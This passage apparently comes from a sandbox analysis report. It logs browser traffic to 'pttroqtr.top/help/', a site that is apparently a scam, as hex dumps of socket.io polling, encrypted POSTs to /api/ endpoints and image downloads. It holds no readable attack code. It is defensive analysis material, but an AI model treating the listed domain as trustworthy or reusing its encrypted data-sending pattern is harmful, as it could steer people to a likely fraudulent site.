                                                                                                                                                                                            2024-09-28 03:39:33 UTC16384INData Raw: 8e c9 1e ec 4b d2 40 13 d3 ff 55 56 55 b5 e9 73 59 df 04 00 2b 65 63 1d 8f a7 0c 81 f4 27 cd 14 ca 00 00 00 00 84 17 0d 34 00 00 3f ab d1 1c a5 79 4f dc aa 95 4e 94 04 6b 60 90 a6 32 32 77 9e 9a 9a fc 2a a7 62 88 f5 e9 21 99 9b cf 95 d4 51 7b 89 24 42 f3 74 d2 76 5e d9 8b ea 57 69 f6 d3 9c a1 19 a7 69 2c c2 65 d9 48 86 8d 34 d7 6a ee 14 d7 50 33 90 bb 28 50 12 4b 34 bf 2f d2 7d bb 5c 9a a5 04 0d 34 4b f4 61 b2 5f a2 ed 13 65 2a b6 a3 81 06 00 56 e2 74 4d 1d 65 08 9c b9 9a ff a3 0c 00 00 00 40 b8 d1 40 03 00 f0 ab ef 6b 9e d0 dc 2f ac 6b 42 61 58 37 c9 01 51 39 d8 ea ea 6a a9 ad ad 95 a6 a6 a6 22 55 33 2e a9 23 f6 90 cc ad e7 49 ac 4f cf b0 95 6f 92 e6 46 71 8d 7b c7 68 fe a5 59 58 a4 cb fa 96 e6 7c 71 ab 9d ec 32 47 70 57 05 8a ee 13 71 93 68 c2 c2 9a 81
                                                                                                                                                                                            Data Ascii: K@UVUsY+ec'4?yONk`22w*b!Q{$Btv^Wii,eH4jP3(PK4/}\4Ka_e*VtMe@@k/kBaX7Q9j"U3.#IOoFq{hYX|q2GpWqh
                                                                                                                                                                                            2024-09-28 03:39:33 UTC16384INData Raw: 5d 3e ea 5c 24 5d e2 be 4e 26 d2 04 47 64 6c 8b 24 4e 3b 54 22 a3 9b 56 7a 8e 5a a3 da 2a ab ac 12 c4 e6 99 af 69 7e e5 9f 5a e1 64 53 1e d6 d4 cc e1 8c 45 16 35 6a 1e d7 4c a4 14 58 86 b9 e2 d6 c6 fd 51 f3 aa e6 9f 94 04 01 36 5a f3 9c a6 99 52 e4 dd 6f 34 bb 6a 66 53 8a c0 da 54 f3 bc f0 61 f4 42 b8 43 dc 6b bf 00 00 e4 15 77 fa 00 90 3f 4f 68 b6 d7 3c a6 19 46 39 32 b6 ba b8 17 78 f6 d4 3c 4d 39 d0 ad 55 f3 4d 8d 8d 9b 98 4c 39 fc cd 2f 3f d6 d8 b8 90 47 28 07 b2 e5 cb 8d 29 35 35 4b 0f 58 b3 f5 49 d3 a6 4d 5b e6 df b7 46 82 d6 d6 d6 de 27 6b 24 d2 d3 54 b3 78 82 8c fd f7 92 93 71 96 c5 1a 66 ec cf c6 e3 71 7f 4d 53 53 53 93 ff eb 6c 37 e8 2c 29 3a a2 41 2a 2f fc 96 94 1f b7 9f cc bf f1 41 59 70 f7 13 d2 35 7f 61 ee 0a 9e 4c e8 d7 96 90 91 6d 09 99 b7
                                                                                                                                                                                            Data Ascii: ]>\$]N&Gdl$N;T"VzZ*i~ZdSE5jLXQ6ZRo4jfSTaBCkw?Oh<F92x<M9UML9/?G()55KXIM[F'k$TxqfqMSSSl7,):A*/AYp5aLm
                                                                                                                                                                                            2024-09-28 03:39:33 UTC3538INData Raw: ad c2 fe 5d e6 88 cc 79 1e 02 00 60 84 29 d0 8c 07 05 1a 60 ba d5 f7 85 7f cd dc 37 da 4d 2a dc 3c 05 9a fe d4 d1 67 8f 1b 9e 27 9b 1b c7 2d 52 a0 01 98 21 cb 19 01 00 00 0b 70 79 dc 70 be 7b 59 26 73 a7 cc dd a2 15 6a ea 0e a2 2a d3 d4 c5 ae a9 78 e3 e8 a1 43 ca b1 99 df 67 be 9b 39 20 73 bd 87 03 00 00 80 31 70 cc 90 55 86 d7 cb 9b 66 5e 96 b9 b3 d1 40 1c 34 a4 6e d0 7a 40 b4 63 c5 9f 17 ed c8 27 00 18 09 36 d0 00 00 70 6b dc 76 c8 b2 d1 ee 1e da 21 da 5d 76 ab 0c a9 23 a0 96 f4 42 c8 df 33 e7 64 4e ca 7c 22 da 45 c8 0b 32 97 1a 3b 00 30 c3 6c a0 19 0f 36 d0 00 a3 60 9d 21 7b 67 1e 3d bc 86 be 8d b1 d8 40 c3 3f 54 b9 ac 8a 66 af ce 6c 1c ed 86 2d 85 1a 1b 68 00 66 8c 0d 34 00 00 dc 1a 17 0f 29 a7 45 bb 93 68 ae d9 d1 d6 56 57 b1 66 ee 39 f0 75 21 64 ad
                                                                                                                                                                                            Data Ascii: ]y`)`7M*<g'-R!pyp{Y&sj*xCg9 s1pUf^@4nz@c'6pkv!]v#B3dN|"E2;0l6`!{g=@?Tfl-hf4)EhVWf9u!d


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            48192.168.2.5497718.211.203.1654432584C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-09-28 03:39:33 UTC579OUTGET /socket.io/?EIO=4&transport=polling&t=P8sjbRz&sid=xZsOXWwlpa9sZhJdAEf0 HTTP/1.1
                                                                                                                                                                                            Host: pttroqtr.top
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                            Referer: https://pttroqtr.top/help/
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-09-28 03:39:33 UTC215INHTTP/1.1 200 OK
                                                                                                                                                                                            Server: nginx/1.24.0
                                                                                                                                                                                            Date: Sat, 28 Sep 2024 03:39:33 GMT
                                                                                                                                                                                            Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                                            Content-Length: 98
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                            cache-control: no-store
                                                                                                                                                                                            2024-09-28 03:39:33 UTC98INData Raw: 34 33 30 5b 7b 22 63 6f 64 65 22 3a 30 2c 22 6d 73 67 22 3a 22 6f 6b 22 2c 22 74 69 6d 65 22 3a 22 53 61 74 20 53 65 70 20 32 38 20 32 30 32 34 20 30 33 3a 33 39 3a 33 31 20 47 4d 54 2b 30 30 30 30 20 28 43 6f 6f 72 64 69 6e 61 74 65 64 20 55 6e 69 76 65 72 73 61 6c 20 54 69 6d 65 29 22 7d 5d
                                                                                                                                                                                            Data Ascii: 430[{"code":0,"msg":"ok","time":"Sat Sep 28 2024 03:39:31 GMT+0000 (Coordinated Universal Time)"}]


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            49192.168.2.5497728.211.203.1654432584C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-09-28 03:39:33 UTC618OUTPOST /api/MC42NDcxMDI1MjYyOTk4MDM0 HTTP/1.1
                                                                                                                                                                                            Host: pttroqtr.top
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            Content-Length: 296
                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            Content-Type: text/encrypt
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Origin: https://pttroqtr.top
                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                            Referer: https://pttroqtr.top/help/
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-09-28 03:39:33 UTC296OUTData Raw: 55 32 46 73 64 47 56 6b 58 31 2b 41 37 69 48 33 76 69 39 50 56 61 50 65 6a 6e 4f 4d 32 65 51 79 64 42 6f 55 69 68 58 4b 4e 4e 67 55 64 77 73 4d 52 77 43 43 6d 65 51 53 2f 35 63 47 35 6c 72 5a 45 56 38 61 61 34 6b 48 57 43 70 41 64 78 78 6d 67 78 6e 66 37 47 6d 65 36 43 6e 49 35 57 42 62 64 71 51 37 36 58 38 65 37 5a 4b 41 4f 69 76 77 4d 72 4c 39 4b 76 37 30 52 7a 61 4d 34 78 4d 48 6c 4a 37 46 4e 5a 47 64 51 76 71 68 44 5a 48 2f 58 70 4a 6f 46 70 2b 72 47 4b 6b 2f 62 37 6f 55 4e 43 36 47 63 6b 77 72 32 42 2b 37 5a 54 4d 73 55 2b 74 65 39 44 2b 37 4c 62 74 6d 69 70 48 64 65 46 33 37 4c 36 50 78 74 47 4b 71 75 6c 34 59 70 32 64 53 78 31 57 47 6f 72 56 42 4a 4f 4b 34 4c 4f 53 6c 48 2f 77 37 6a 42 36 48 61 44 2b 56 69 54 46 45 6a 2b 76 6d 43 59 43 2b 41 4c 46
                                                                                                                                                                                            Data Ascii: U2FsdGVkX1+A7iH3vi9PVaPejnOM2eQydBoUihXKNNgUdwsMRwCCmeQS/5cG5lrZEV8aa4kHWCpAdxxmgxnf7Gme6CnI5WBbdqQ76X8e7ZKAOivwMrL9Kv70RzaM4xMHlJ7FNZGdQvqhDZH/XpJoFp+rGKk/b7oUNC6Gckwr2B+7ZTMsU+te9D+7LbtmipHdeF37L6PxtGKqul4Yp2dSx1WGorVBJOK4LOSlH/w7jB6HaD+ViTFEj+vmCYC+ALF
                                                                                                                                                                                            2024-09-28 03:39:33 UTC238INHTTP/1.1 200 OK
                                                                                                                                                                                            Server: nginx/1.24.0
                                                                                                                                                                                            Date: Sat, 28 Sep 2024 03:39:33 GMT
                                                                                                                                                                                            Content-Type: application/json; charset=utf-8
                                                                                                                                                                                            Content-Length: 36
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                            ETag: W/"24-r8kBlV+a3EzGrfQbTuwvriBjDI4"
                                                                                                                                                                                            2024-09-28 03:39:33 UTC36INData Raw: 55 32 46 73 64 47 56 6b 58 31 39 34 2f 39 4e 73 6c 42 47 72 69 32 4b 2b 41 79 48 79 2b 6c 4b 31 39 75 4d 3d
                                                                                                                                                                                            Data Ascii: U2FsdGVkX194/9NslBGri2K+AyHy+lK19uM=


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            50192.168.2.5497738.211.203.1654432584C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-09-28 03:39:33 UTC599OUTGET /help/layout/images/33.png HTTP/1.1
                                                                                                                                                                                            Host: pttroqtr.top
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                            Sec-Fetch-Dest: image
                                                                                                                                                                                            Referer: https://pttroqtr.top/help/
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-09-28 03:39:33 UTC311INHTTP/1.1 200 OK
                                                                                                                                                                                            Server: nginx/1.24.0
                                                                                                                                                                                            Date: Sat, 28 Sep 2024 03:39:33 GMT
                                                                                                                                                                                            Content-Type: image/png
                                                                                                                                                                                            Content-Length: 11236
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Cache-Control: public, max-age=86400
                                                                                                                                                                                            Last-Modified: Wed, 29 May 2024 10:14:36 GMT
                                                                                                                                                                                            ETag: W/"2be4-18fc3d82ee0"
                                                                                                                                                                                            2024-09-28 03:39:33 UTC11236INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 71 00 00 01 a1 08 06 00 00 00 0e 5b e2 8a 00 00 00 09 70 48 59 73 00 00 2e 23 00 00 2e 23 01 78 a5 3f 76 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 2b 71 49 44 41 54 78 da ec dd 4d 56 1b d7 ba 06 e0 8a d7 e9 db 67 04 26 23 80 74 6f 07 79 04 26 ad 34 2d 8f c0 64 04 51 46 60 3c 02 cb cd db 0a 1e 81 e5 ce e9 1a 46 10 18 c1 35 23 f0 ad 0f b6 8e 65 02 48 55 7b 97 aa 4a 3c cf 5a 5a c9 39 01 51 bf bb de da bf 3f 7d fb f6 ad 02 00 60 5c 9e 38 04 00 00 42 1c 00 00 42 1c 00 00 42 1c 00 80 10 07 00 80 10 07 00 80 10 07 00 20 c4 01 00 20 c4 01 00 20 c4 01 00 08 71 00 00 08 71 00 00 08 71 00 00 08 71 00 00 42 1c 00 00 42 1c 00 00 42 1c 00
                                                                                                                                                                                            Data Ascii: PNGIHDRq[pHYs.#.#x?vtEXtSoftwareAdobe ImageReadyqe<+qIDATxMVg&#toy&4-dQF`<F5#eHU{J<ZZ9Q?}`\8BBB qqqqBBB


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            51192.168.2.5497758.211.203.1654432584C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-09-28 03:39:33 UTC599OUTGET /help/layout/images/34.png HTTP/1.1
                                                                                                                                                                                            Host: pttroqtr.top
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                            Sec-Fetch-Dest: image
                                                                                                                                                                                            Referer: https://pttroqtr.top/help/
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-09-28 03:39:33 UTC311INHTTP/1.1 200 OK
                                                                                                                                                                                            Server: nginx/1.24.0
                                                                                                                                                                                            Date: Sat, 28 Sep 2024 03:39:33 GMT
                                                                                                                                                                                            Content-Type: image/png
                                                                                                                                                                                            Content-Length: 14568
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Cache-Control: public, max-age=86400
                                                                                                                                                                                            Last-Modified: Wed, 29 May 2024 10:14:36 GMT
                                                                                                                                                                                            ETag: W/"38e8-18fc3d82ee0"
                                                                                                                                                                                            2024-09-28 03:39:33 UTC14568INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 71 00 00 01 a1 08 06 00 00 00 0e 5b e2 8a 00 00 00 09 70 48 59 73 00 00 2e 23 00 00 2e 23 01 78 a5 3f 76 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 38 75 49 44 41 54 78 da ec dd 3d 56 1b c9 de c7 f1 f2 3d 73 ce 84 f0 ac 00 4d 44 88 26 22 a4 bd 02 34 e1 8d 90 57 80 bc 02 e4 15 58 ac 00 11 39 b4 58 81 45 48 64 11 12 59 ac 60 50 78 23 9e fe 77 55 1b 59 06 a9 5f aa aa ab ba bf 9f 73 34 9e 19 83 d4 2a 75 ab 7e 5d af ef 9e 9f 9f 15 00 00 00 e2 f2 1f 8a 00 00 00 80 10 07 00 00 00 42 1c 00 00 00 08 71 00 00 00 84 38 00 00 00 10 e2 00 00 00 40 88 03 00 00 20 c4 01 00 00 80 10 07 00 00 00 42 1c 00 00 00 21 0e 00 00 00 84 38 00 00 00 10
                                                                                                                                                                                            Data Ascii: PNGIHDRq[pHYs.#.#x?vtEXtSoftwareAdobe ImageReadyqe<8uIDATx=V=sMD&"4WX9XEHdY`Px#wUY_s4*u~]Bq8@ B!8


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            52192.168.2.5497748.211.203.1654432584C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-09-28 03:39:33 UTC599OUTGET /help/layout/images/35.png HTTP/1.1
                                                                                                                                                                                            Host: pttroqtr.top
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                            Sec-Fetch-Dest: image
                                                                                                                                                                                            Referer: https://pttroqtr.top/help/
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-09-28 03:39:33 UTC311INHTTP/1.1 200 OK
                                                                                                                                                                                            Server: nginx/1.24.0
                                                                                                                                                                                            Date: Sat, 28 Sep 2024 03:39:33 GMT
                                                                                                                                                                                            Content-Type: image/png
                                                                                                                                                                                            Content-Length: 10360
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Cache-Control: public, max-age=86400
                                                                                                                                                                                            Last-Modified: Wed, 29 May 2024 10:14:36 GMT
                                                                                                                                                                                            ETag: W/"2878-18fc3d82ee0"
                                                                                                                                                                                            2024-09-28 03:39:33 UTC10360INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 71 00 00 01 a1 08 06 00 00 00 0e 5b e2 8a 00 00 00 09 70 48 59 73 00 00 2e 23 00 00 2e 23 01 78 a5 3f 76 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 28 05 49 44 41 54 78 da ec dd 4d 7a d3 58 fa 37 60 c1 d5 f3 d0 2b 20 bd 82 a4 a6 ff 09 ae 15 90 1e f5 10 b3 02 52 2b c0 ac a0 c2 0a 30 c3 1a 11 56 80 99 bc d3 4a 56 50 66 05 0d 2b e0 f5 43 1e 75 a9 5c f9 b0 ec 23 5b b2 ef fb ba 7c d1 5d 10 47 96 e4 73 7e 3a 9f 8f be 7f ff 5e 01 00 30 2c 8f 9d 02 00 00 21 0e 00 00 21 0e 00 00 21 0e 00 40 88 03 00 40 88 03 00 40 88 03 00 10 e2 00 00 10 e2 00 00 10 e2 00 00 84 38 00 00 84 38 00 00 84 38 00 00 84 38 00 00 21 0e 00 00 21 0e 00 00 21 0e
                                                                                                                                                                                            Data Ascii: PNGIHDRq[pHYs.#.#x?vtEXtSoftwareAdobe ImageReadyqe<(IDATxMzX7`+ R+0VJVPf+Cu\#[|]Gs~:^0,!!!@@@8888!!!


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            53192.168.2.5497788.211.203.1654432584C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-09-28 03:39:33 UTC405OUTGET /socket.io/?EIO=4&transport=polling&t=P8sjax1&sid=xZsOXWwlpa9sZhJdAEf0 HTTP/1.1
                                                                                                                                                                                            Host: pttroqtr.top
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-09-28 03:39:33 UTC214INHTTP/1.1 200 OK
                                                                                                                                                                                            Server: nginx/1.24.0
                                                                                                                                                                                            Date: Sat, 28 Sep 2024 03:39:33 GMT
                                                                                                                                                                                            Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                                            Content-Length: 1
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                            cache-control: no-store
                                                                                                                                                                                            2024-09-28 03:39:33 UTC1INData Raw: 31
                                                                                                                                                                                            Data Ascii: 1


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            54192.168.2.5497798.211.203.1654432584C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-09-28 03:39:33 UTC405OUTGET /socket.io/?EIO=4&transport=polling&t=P8sjawy&sid=xZsOXWwlpa9sZhJdAEf0 HTTP/1.1
                                                                                                                                                                                            Host: pttroqtr.top
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-09-28 03:39:33 UTC166INHTTP/1.1 400 Bad Request
                                                                                                                                                                                            Server: nginx/1.24.0
                                                                                                                                                                                            Date: Sat, 28 Sep 2024 03:39:33 GMT
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                            2024-09-28 03:39:33 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            55192.168.2.5497808.211.203.1654432584C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-09-28 03:39:33 UTC671OUTPOST /socket.io/?EIO=4&transport=polling&t=P8sjbcz&sid=xZsOXWwlpa9sZhJdAEf0 HTTP/1.1
                                                                                                                                                                                            Host: pttroqtr.top
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            Content-Length: 619
                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Content-type: text/plain;charset=UTF-8
                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                            Origin: https://pttroqtr.top
                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                            Referer: https://pttroqtr.top/help/
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-09-28 03:39:33 UTC619OUTData Raw: 34 32 31 5b 22 6d 65 73 73 61 67 65 22 2c 7b 22 6d 73 67 22 3a 7b 22 74 79 70 65 22 3a 22 55 32 46 73 64 47 56 6b 58 31 2f 4f 65 45 6c 77 33 61 53 70 70 72 46 66 64 51 46 5a 49 41 62 69 30 66 51 6d 22 2c 22 64 61 74 61 22 3a 22 55 32 46 73 64 47 56 6b 58 31 2b 30 6e 62 66 32 66 39 51 4f 36 32 4b 43 48 46 77 73 4e 6e 43 69 6e 70 71 78 64 58 39 6f 45 53 65 34 6a 6b 42 4b 4d 54 4f 55 33 77 58 73 71 48 41 6a 72 70 45 61 4e 72 62 33 7a 59 4f 4f 6f 32 52 32 4a 6b 70 79 75 41 5a 59 5a 73 72 69 41 31 53 39 6b 54 68 36 42 64 6d 64 71 73 35 67 34 6f 56 76 42 6e 34 54 53 7a 50 58 46 4c 55 30 33 71 4b 71 6e 47 79 69 31 43 49 6d 6b 6e 67 6d 50 31 79 73 6f 42 43 43 4b 30 58 5a 4a 58 4e 58 59 78 5a 4a 58 4b 71 6e 79 62 6b 4a 38 73 35 48 56 73 45 49 31 64 4e 4f 72 75 74
                                                                                                                                                                                            Data Ascii: 421["message",{"msg":{"type":"U2FsdGVkX1/OeElw3aSpprFfdQFZIAbi0fQm","data":"U2FsdGVkX1+0nbf2f9QO62KCHFwsNnCinpqxdX9oESe4jkBKMTOU3wXsqHAjrpEaNrb3zYOOo2R2JkpyuAZYZsriA1S9kTh6Bdmdqs5g4oVvBn4TSzPXFLU03qKqnGyi1CImkngmP1ysoBCCK0XZJXNXYxZJXKqnybkJ8s5HVsEI1dNOrut
                                                                                                                                                                                            2024-09-28 03:39:33 UTC198INHTTP/1.1 400 Bad Request
                                                                                                                                                                                            Server: nginx/1.24.0
                                                                                                                                                                                            Date: Sat, 28 Sep 2024 03:39:33 GMT
                                                                                                                                                                                            Content-Type: application/json
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                            2024-09-28 03:39:33 UTC52INData Raw: 32 39 0d 0a 7b 22 63 6f 64 65 22 3a 31 2c 22 6d 65 73 73 61 67 65 22 3a 22 53 65 73 73 69 6f 6e 20 49 44 20 75 6e 6b 6e 6f 77 6e 22 7d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 29{"code":1,"message":"Session ID unknown"}0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            56192.168.2.5497818.211.203.1654432584C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-09-28 03:39:33 UTC368OUTGET /api/MC40NjgzNzc3MjY1OTI2NzY3NA== HTTP/1.1
                                                                                                                                                                                            Host: pttroqtr.top
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-09-28 03:39:33 UTC164INHTTP/1.1 404 Not Found
                                                                                                                                                                                            Server: nginx/1.24.0
                                                                                                                                                                                            Date: Sat, 28 Sep 2024 03:39:33 GMT
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            Connection: close
